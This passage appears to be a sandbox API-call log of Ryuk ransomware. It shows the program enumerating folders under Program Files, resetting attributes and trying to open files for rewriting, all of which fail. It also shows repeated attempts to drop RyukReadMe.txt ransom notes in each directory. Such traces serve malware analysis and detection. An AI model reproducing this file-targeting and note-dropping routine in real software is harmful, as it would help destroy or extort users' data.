dwFileAttributes=0x80) returned 0 [0133.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.370] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.370] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.370] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.370] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.370] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb", dwFileAttributes=0x80) returned 0 [0133.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.370] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.371] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.371] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.371] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.371] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.371] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb", dwFileAttributes=0x80) returned 0 [0133.371] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.372] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.372] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.372] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.372] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.372] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.372] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb", dwFileAttributes=0x80) returned 0 [0133.372] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.372] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.372] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.372] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.372] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.372] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.372] SetLastError (dwErrCode=0x0) [0133.372] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ado\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.373] GetLastError () returned 0x5 [0133.373] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.373] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.373] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.373] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.373] SetLastError (dwErrCode=0x0) [0133.373] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.373] GetLastError () returned 0x5 [0133.373] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.373] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.373] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.373] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.373] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.373] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.373] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.373] SetLastError (dwErrCode=0x0) [0133.373] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.373] GetLastError () returned 0x5 [0133.373] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.374] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.374] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.374] SetLastError (dwErrCode=0x0) [0133.374] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.374] GetLastError () returned 0x5 [0133.374] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.374] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.374] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.375] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.375] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.376] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.376] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc", dwFileAttributes=0x80) returned 0 [0133.376] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.376] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.376] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.377] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.377] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.377] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc", dwFileAttributes=0x80) returned 0 [0133.377] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.377] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.377] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.377] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.377] SetLastError (dwErrCode=0x0) [0133.377] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\msadc\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.377] GetLastError () returned 0x5 [0133.377] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.377] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.377] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.379] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.379] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.379] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.379] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.379] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.379] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.379] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.379] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.379] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.379] SetLastError (dwErrCode=0x0) [0133.379] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.382] GetLastError () returned 0x5 [0133.382] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.382] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.382] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.382] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\handler.reg", dwFileAttributes=0x80) returned 0 [0133.383] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\handler.reg" (normalized: "c:\\program files\\common files\\system\\msadc\\handler.reg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.383] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.383] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.383] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.383] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.383] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg", dwFileAttributes=0x80) returned 0 [0133.384] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg" (normalized: "c:\\program files\\common files\\system\\msadc\\handsafe.reg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.384] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.384] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.384] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.384] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.384] SetLastError (dwErrCode=0x0) [0133.384] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\msadc\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.384] GetLastError () returned 0x5 [0133.384] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.384] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.384] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.384] SetLastError (dwErrCode=0x0) [0133.384] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.385] GetLastError () returned 0x5 [0133.385] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.385] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.385] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.385] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.385] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.385] SetLastError (dwErrCode=0x0) [0133.385] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\msmapi\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.386] GetLastError () returned 0x5 [0133.386] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.386] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.386] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.386] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.386] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.386] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.386] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.386] SetLastError (dwErrCode=0x0) [0133.386] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.386] GetLastError () returned 0x5 [0133.386] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.386] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.386] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.386] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.386] SetLastError (dwErrCode=0x0) [0133.386] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\msmapi\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.386] GetLastError () returned 0x5 [0133.386] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.386] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.386] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.386] SetLastError (dwErrCode=0x0) [0133.387] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.387] GetLastError () returned 0x5 [0133.387] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.387] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.387] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.388] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.388] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.388] SetLastError (dwErrCode=0x0) [0133.388] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ole db\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.388] GetLastError () returned 0x5 [0133.388] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.388] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.388] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.388] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.388] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.388] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.388] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.389] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.389] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui", dwFileAttributes=0x80) returned 0 [0133.389] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.389] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.389] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.390] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.390] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui", dwFileAttributes=0x80) returned 0 [0133.390] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.390] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.390] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.390] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.390] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.390] SetLastError (dwErrCode=0x0) [0133.390] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.390] GetLastError () returned 0x5 [0133.390] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.390] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.390] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.390] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.390] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.391] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.391] FindNextFileW (in: 